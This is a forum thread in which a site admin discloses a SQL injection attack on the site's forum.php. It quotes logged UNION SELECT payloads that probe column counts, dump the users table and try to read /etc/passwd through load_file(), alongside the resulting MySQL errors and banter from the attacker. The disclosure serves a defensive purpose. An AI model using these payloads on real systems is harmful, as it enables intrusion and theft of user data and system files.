Hacking attemp

Today someone tried to hack around a bit

The attacker was succesfully trying to inject mysql code and made forum.php behave differently.
Luckily i checked the log since a long time, just in the moment the attacker was trying to exploit it.

While the hacker tried variations of malicious input, i uploaded a patch, and checked all sql queries for similar weaknesses. (I was lucky this time ;)

If someone is interested i will post some of the injections here.

Btw: WeChall sourcecode is available wechall.zip, but not always very current.

I think everybody's interesting in the injections

This is a quote of our logfiles, IP's have been removed.

Unknown User accessed /forum.php?action=showthread&boardid=14&threadid=NULL%20UNION%20SELECT%201,2,3%20FROM%20lol--

Error:MySqlError(1146) in query 'SELECT *, `challid` AS `foo` FROM `threads` WHERE `threadid`=NULL UNION SELECT 1,2,3 FROM lol-- AND (`challid`='0' OR (SELECT `challid` FROM `solved` WHERE `userid`='0' AND `challid`=`foo`)) LIMIT 1': Table 'gizmore_wechall.lol' doesn't exist.
-------------------------------------------------
Unknown User accessed /forum.php?action=showthread&boardid=14&threadid=NULL%20UNION%20SELECT%201,2,3,4%20FROM%20users--

Error:MySqlError(1222) in query 'SELECT *, `challid` AS `foo` FROM `threads` WHERE `threadid`=NULL UNION SELECT 1,2,3,4 FROM users-- AND (`challid`='0' OR (SELECT `challid` FROM `solved` WHERE `userid`='0' AND `challid`=`foo`)) LIMIT 1': The used SELECT statements have a different number of columns.
------------------
now he was trying to guess the number of returned columns
btw: mysql errors were reported to the attacker as shown in the logs
-------------------
Unknown User accessed /forum.php?action=showthread&boardid=14&threadid=NULL%20UNION%20SELECT%20username,username,username,username,username,username,username,username,username,username,username%20FROM%20users--

Error:MySqlError(1054) in query 'SELECT COUNT(*) FROM `posts` WHERE `threadid`=alt3rn4tiv3 LIMIT 1': Unknown column 'alt3rn4tiv3' in 'where clause'.
-------------------
the one above looks really weird to me, and i am a clueless why "alt3rn4tiv3" is shown :s
------------------------------
Unknown User accessed /forum.php?action=showthread&boardid=14&threadid=NULL%20UNION%20SELECT%20load_file(CHAR(47,%20101,%20116,%2099,%2047,%20112,%2097,%20115,%20115,%20119,%20100,%2047)),2,3,4,username,username,username,username,username,username,username%20FROM%20users%20WHERE%20userid%20=%2081--

Error:MySqlError(1064) in query 'SELECT COUNT(*) FROM `posts` WHERE `threadid`= LIMIT 1': You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LIMIT 1' at line 1.
-----------------------------
And this one was the last for now
I hope i really got lucky and no harm was caused.

Greets
Gizmore

haha, yeah it was me

the idea of a `hacking` site, vul. to SQL injections, is just very opening to the knowledge of site owners...

work on your security, before you open a hacking site, k?

here is my site: darkmindz.com, you should check it out for.. real hacking deals i guess...

anyways, keep up the good work, security, etc. and have a good day

/me slaps Gizmore around a bit with the frozen trout

@romeo: this is not a hacking site
We do welcome attempts to find bugs & vulnerabilities, just let us know when you find something.

We're not professional PHP coders and can use all the help we can get..

RoMeO pwned:
http://stashbox.org/755566/antisec.txt

Nice article..

I really enjoyed reading that. Bit over the top maybe, but still, it's never so funny when you are on the recieving end, eh?

And funny the guy found some SQLI here and got caught by accident

It was quite exciting when he was doing the injections while i was patching it, nice timing

Meanwhile, wechall should be quite secure.